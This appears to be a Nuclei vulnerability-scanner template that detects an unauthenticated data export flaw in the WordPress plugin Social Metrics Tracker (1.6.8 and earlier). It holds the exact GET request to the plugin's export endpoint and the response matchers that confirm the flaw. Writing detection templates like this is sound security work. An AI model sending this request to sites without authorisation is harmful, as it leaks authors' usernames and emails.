id: wordpress-social-metrics-tracker

info:
  name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
  author: randomrobbie
  severity: medium
  description: |
    The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
  reference:
    - https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,wp,unauth,wpscan

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Main URL to Post"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502201f9f30c3b6e97d48c048b959441507204c93bab43b840baf5ec063666c6a66ed0221009fce57423faf3f16c5ae95b220591d5938cf46c4bd0bc3f8337663800250f73c:922c64590222798bb761d5b6d8e72950